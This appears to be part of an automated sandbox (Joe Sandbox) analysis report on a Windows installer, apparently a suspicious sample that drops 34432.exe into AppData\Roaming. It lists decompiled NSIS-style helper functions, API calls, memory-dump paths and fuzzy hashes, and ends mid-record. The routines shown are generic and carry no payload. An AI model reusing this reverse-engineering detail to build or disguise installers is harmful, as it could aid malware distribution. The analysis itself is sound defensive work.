                            Instruction addresses: 0x00404d4f 0x00404d54 0x00404d5c 0x00404d5d 0x00404d6a 0x00404d72 0x00404d73 0x00404d75 0x00404d77 0x00404d79 0x00404d7c 0x00404d7c 0x00404d83 0x00404d89 0x00404d89 0x00404d90 0x00404d97 0x00404d9a 0x00404d9d 0x00404d9d 0x00404da1 0x00404db1 0x00404db3 0x00404db6 0x00404d5f 0x00404d5f 0x00404d66 0x00404d66 0x00404dbe 0x00404dc9 0x00404ddf 0x00404df0 0x00404e0c

                            APIs
                            • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                            • wsprintfW.USER32 ref: 00404DF0
                            • SetDlgItemTextW.USER32 ref: 00404E03
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: ItemTextlstrlenwsprintf
                            • String ID: %u.%u%s%s
                            • API String ID: 3540041739-3551169577
                            • Opcode ID: 06d0c97e576fd12928d3ccf504f16285b7ed678bb4ff82b9d12c133dfbf75c1e
                            • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                            • Opcode Fuzzy Hash: 06d0c97e576fd12928d3ccf504f16285b7ed678bb4ff82b9d12c133dfbf75c1e
                            • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 58%
                            			E00405E0C(WCHAR* _a4) {
                            				WCHAR* _t9;
                            
                            				_t9 = _a4;
                            				_push( &(_t9[lstrlenW(_t9)]));
                            				_push(_t9);
                            				if( *(CharPrevW()) != 0x5c) {
                            					lstrcatW(_t9, 0x40a014);
                            				}
                            				return _t9;
                            			}
                            Instruction addresses: 0x00405e0d 0x00405e1a 0x00405e1b 0x00405e26 0x00405e2e 0x00405e2e 0x00405e36

                            APIs
                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CharPrevlstrcatlstrlen
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 2659869361-3081826266
                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                            • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                            • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00403019(intOrPtr _a4) {
                            				long _t2;
                            				struct HWND__* _t3;
                            				struct HWND__* _t6;
                            
                            				if(_a4 == 0) {
                            					__eflags =  *0x42aa20; // 0x0
                            					if(__eflags == 0) {
                            						_t2 = GetTickCount();
                            						__eflags = _t2 -  *0x434f0c;
                            						if(_t2 >  *0x434f0c) {
                            							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                            							 *0x42aa20 = _t3;
                            							return ShowWindow(_t3, 5);
                            						}
                            						return _t2;
                            					} else {
                            						return E00406946(0);
                            					}
                            				} else {
                            					_t6 =  *0x42aa20; // 0x0
                            					if(_t6 != 0) {
                            						_t6 = DestroyWindow(_t6);
                            					}
                            					 *0x42aa20 = 0;
                            					return _t6;
                            				}
                            			}
                            Instruction addresses: 0x00403020 0x0040303a 0x00403040 0x0040304a 0x00403050 0x00403056 0x00403067 0x00403070 0x00000000 0x00403075 0x0040307c 0x00403042 0x00403049 0x00403049 0x00403022 0x00403022 0x00403029 0x0040302c 0x0040302c 0x00403032 0x00403039 0x00403039

                            APIs
                            • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                            • GetTickCount.KERNEL32 ref: 0040304A
                            • CreateDialogParamW.USER32 ref: 00403067
                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                            • String ID:
                            • API String ID: 2102729457-0
                            • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                            • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                            • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                            • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 53%
                            			E00405F14(void* __eflags, intOrPtr _a4) {
                            				int _t11;
                            				signed char* _t12;
                            				intOrPtr _t18;
                            				intOrPtr* _t21;
                            				signed int _t23;
                            
                            				E0040653D(0x42fa70, _a4);
                            				_t21 = E00405EB7(0x42fa70);
                            				if(_t21 != 0) {
                            					E004067C4(_t21);
                            					if(( *0x434f18 & 0x00000080) == 0) {
                            						L5:
                            						_t23 = _t21 - 0x42fa70 >> 1;
                            						while(1) {
                            							_t11 = lstrlenW(0x42fa70);
                            							_push(0x42fa70);
                            							if(_t11 <= _t23) {
                            								break;
                            							}
                            							_t12 = E00406873();
                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                            								E00405E58(0x42fa70);
                            								continue;
                            							} else {
                            								goto L1;
                            							}
                            						}
                            						E00405E0C();
                            						return 0 | GetFileAttributesW(??) != 0xffffffff;
                            					}
                            					_t18 =  *_t21;
                            					if(_t18 == 0 || _t18 == 0x5c) {
                            						goto L1;
                            					} else {
                            						goto L5;
                            					}
                            				}
                            				L1:
                            				return 0;
                            			}
                            Instruction addresses: 0x00405f20 0x00405f2b 0x00405f2f 0x00405f36 0x00405f42 0x00405f52 0x00405f54 0x00405f6c 0x00405f6d 0x00405f74 0x00405f75 0x00000000 0x00000000 0x00405f58 0x00405f5f 0x00405f67 0x00000000 0x00000000 0x00000000 0x00000000 0x00405f5f 0x00405f77 0x00000000 0x00405f8b 0x00405f44 0x00405f4a 0x00000000 0x00000000 0x00000000 0x00000000 0x00405f4a 0x00405f31 0x00000000

                            APIs
                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                              • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                            • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                            • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 3248276644-3081826266
                            • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                            • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                            • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                            • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                            				int _t15;
                            				long _t16;
                            
                            				_t15 = _a8;
                            				if(_t15 != 0x102) {
                            					if(_t15 != 0x200) {
                            						_t16 = _a16;
                            						L7:
                            						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                            							_push(_t16);
                            							_push(6);
                            							 *0x42d254 = _t16;
                            							E00404ED4();
                            						}
                            						L11:
                            						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                            					}
                            					if(IsWindowVisible(_a4) == 0) {
                            						L10:
                            						_t16 = _a16;
                            						goto L11;
                            					}
                            					_t16 = E00404E54(_a4, 1);
                            					_t15 = 0x419;
                            					goto L7;
                            				}
                            				if(_a12 != 0x20) {
                            					goto L10;
                            				}
                            				E004044E5(0x413);
                            				return 0;
                            			}
                            Instruction addresses: 0x00405517 0x00405521 0x0040553d 0x0040555f 0x00405562 0x00405568 0x00405572 0x00405573 0x00405575 0x0040557b 0x0040557b 0x00405585 0x00000000 0x00405593 0x0040554a 0x00405582 0x00405582 0x00000000 0x00405582 0x00405556 0x00405558 0x00000000 0x00405558 0x00405527 0x00000000 0x00000000 0x0040552e 0x00000000

                            APIs
                            • IsWindowVisible.USER32(?), ref: 00405542
                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                              • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Window$CallMessageProcSendVisible
                            • String ID:
                            • API String ID: 3748168415-3916222277
                            • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                            • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                            • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                            • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                            				int _v8;
                            				long _t21;
                            				long _t24;
                            				char* _t30;
                            
                            				asm("sbb eax, eax");
                            				_v8 = 0x800;
                            				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                            				_t30 = _a16;
                            				if(_t21 != 0) {
                            					L4:
                            					 *_t30 =  *_t30 & 0x00000000;
                            				} else {
                            					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                            					_t21 = RegCloseKey(_a20);
                            					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                            					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                            						goto L4;
                            					}
                            				}
                            				return _t21;
                            			}
                            0x00406419
                            0x0040641b
                            0x00406433
                            0x00406438
                            0x0040643d
                            0x0040647b
                            0x0040647b
                            0x0040643f
                            0x00406451
                            0x0040645c
                            0x00406462
                            0x0040646d
                            0x00000000
                            0x00000000
                            0x0040646d
                            0x00406481

                            APIs
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,0042C248,00000000,?,?,C:\Users\user\AppData\Roaming\34432.exe,?,?,00406672,80000002), ref: 00406451
                            • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Roaming\34432.exe,C:\Users\user\AppData\Roaming\34432.exe,C:\Users\user\AppData\Roaming\34432.exe,00000000,0042C248), ref: 0040645C
                            Strings
                            • C:\Users\user\AppData\Roaming\34432.exe, xrefs: 00406412
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CloseQueryValue
                            • String ID: C:\Users\user\AppData\Roaming\34432.exe
                            • API String ID: 3356406503-1124846496
                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                            • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                            • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00403B57() {
                            				void* _t2;
                            				void* _t3;
                            				void* _t6;
                            				void* _t8;
                            
                            				_t8 =  *0x42b22c;
                            				_t3 = E00403B3C(_t2, 0);
                            				if(_t8 != 0) {
                            					do {
                            						_t6 = _t8;
                            						_t8 =  *_t8;
                            						FreeLibrary( *(_t6 + 8));
                            						_t3 = GlobalFree(_t6);
                            					} while (_t8 != 0);
                            				}
                            				 *0x42b22c =  *0x42b22c & 0x00000000;
                            				return _t3;
                            			}
                            0x00403b58
                            0x00403b60
                            0x00403b67
                            0x00403b6a
                            0x00403b6a
                            0x00403b6c
                            0x00403b71
                            0x00403b78
                            0x00403b7e
                            0x00403b82
                            0x00403b83
                            0x00403b8b

                            APIs
                            • FreeLibrary.KERNEL32(?,76CDFAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                            • GlobalFree.KERNEL32 ref: 00403B78
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Free$GlobalLibrary
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 1100898210-3081826266
                            • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                            • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                            • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                            • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                            				int _v8;
                            				int _t12;
                            				int _t14;
                            				int _t15;
                            				CHAR* _t17;
                            				CHAR* _t27;
                            
                            				_t12 = lstrlenA(_a8);
                            				_t27 = _a4;
                            				_v8 = _t12;
                            				while(lstrlenA(_t27) >= _v8) {
                            					_t14 = _v8;
                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                            					_t15 = lstrcmpiA(_t27, _a8);
                            					_t27[_v8] =  *(_t14 + _t27);
                            					if(_t15 == 0) {
                            						_t17 = _t27;
                            					} else {
                            						_t27 = CharNextA(_t27);
                            						continue;
                            					}
                            					L5:
                            					return _t17;
                            				}
                            				_t17 = 0;
                            				goto L5;
                            			}
                            0x00405fa2
                            0x00405fa4
                            0x00405fa7
                            0x00405fd3
                            0x00405fac
                            0x00405fb5
                            0x00405fba
                            0x00405fc5
                            0x00405fc8
                            0x00405fe4
                            0x00405fca
                            0x00405fd1
                            0x00000000
                            0x00405fd1
                            0x00405fdd
                            0x00405fe1
                            0x00405fe1
                            0x00405fdb
                            0x00000000

                            APIs
                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                            • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                            • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: lstrlen$CharNextlstrcmpi
                            • String ID:
                            • API String ID: 190613189-0
                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                            • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                            • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cbc34f93633c4adc465ab4fe1366098ee982aaad0d16ae6d0392597ddb45bee3
                            • Instruction ID: 3395399c912543d30720f61d79a053f54571deb984c85d02489e3222c72b5a83
                            • Opcode Fuzzy Hash: cbc34f93633c4adc465ab4fe1366098ee982aaad0d16ae6d0392597ddb45bee3
                            • Instruction Fuzzy Hash: 8B31292560D7890FD31BAA348855562BFA5EF87210B1582FFD0D6CB5E7DD285807C392
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 95d1777218f68f286567c119feed10924efd7df0decd301de1e4c346b3486899
                            • Instruction ID: be8af5848816afce7f2b33570489f305e260eff55a15dd5c622a36e59822dc5e
                            • Opcode Fuzzy Hash: 95d1777218f68f286567c119feed10924efd7df0decd301de1e4c346b3486899
                            • Instruction Fuzzy Hash: 3E31262250D7890FD31B9A348C695627FA6DB87210B1A82FFD4C6CB1A7D8286C07C392
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a2ce7a29c480d311bc3d79a731ed87f1839b566c06709d88ef1e0c6f2a774a66
                            • Instruction ID: 4f70370fdd8d496d7766debfdc6587cdd648079e1fc269bab427ef9f57ffc783
                            • Opcode Fuzzy Hash: a2ce7a29c480d311bc3d79a731ed87f1839b566c06709d88ef1e0c6f2a774a66
                            • Instruction Fuzzy Hash: 12210B2660D6C51FD31B9A398C69462BFAADBC711071A82EFD4C6CB5E3DD285807C392
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0^RU
                            • API String ID: 0-616677034
                            • Opcode ID: 924df49e2792c6e3243180452764e3c1cb9d9918a2a9188dfded39f21c5f26b2
                            • Instruction ID: f402d992327036c44d8256bcf3e9977c58f6e6120c73c0c69e599db38d537302
                            • Opcode Fuzzy Hash: 924df49e2792c6e3243180452764e3c1cb9d9918a2a9188dfded39f21c5f26b2
                            • Instruction Fuzzy Hash: 8C018F30B5890D8FCB4CEB1CC455EADB3E2EF59710B0442A9D40AC72A1DE24EC5287C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: py.~
                            • API String ID: 0-2917235016
                            • Opcode ID: abdb8b6eca5339955b9173f7a722343a8609ee35d5a46ee5ecb23c8efe0b65ba
                            • Instruction ID: f9821d45064052cf356943ede9ec64c9aa4017bb009651321f83a40084de35da
                            • Opcode Fuzzy Hash: abdb8b6eca5339955b9173f7a722343a8609ee35d5a46ee5ecb23c8efe0b65ba
                            • Instruction Fuzzy Hash: 60F0F03671841A0BE78CFA6C80AA2FD62C2EF85300B5001BFE40BCB3D7DC2CA8120395
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: Xz.~
                            • API String ID: 0-3391176896
                            • Opcode ID: 1f6300bdaa702e9e8590f481d5ad9529e3b56cbbe8690c6eb591ff010ad524e8
                            • Instruction ID: 3ee200a853699a73e7831a2399d8d35456a7cbe3a858f9309c368f0427d3233d
                            • Opcode Fuzzy Hash: 1f6300bdaa702e9e8590f481d5ad9529e3b56cbbe8690c6eb591ff010ad524e8
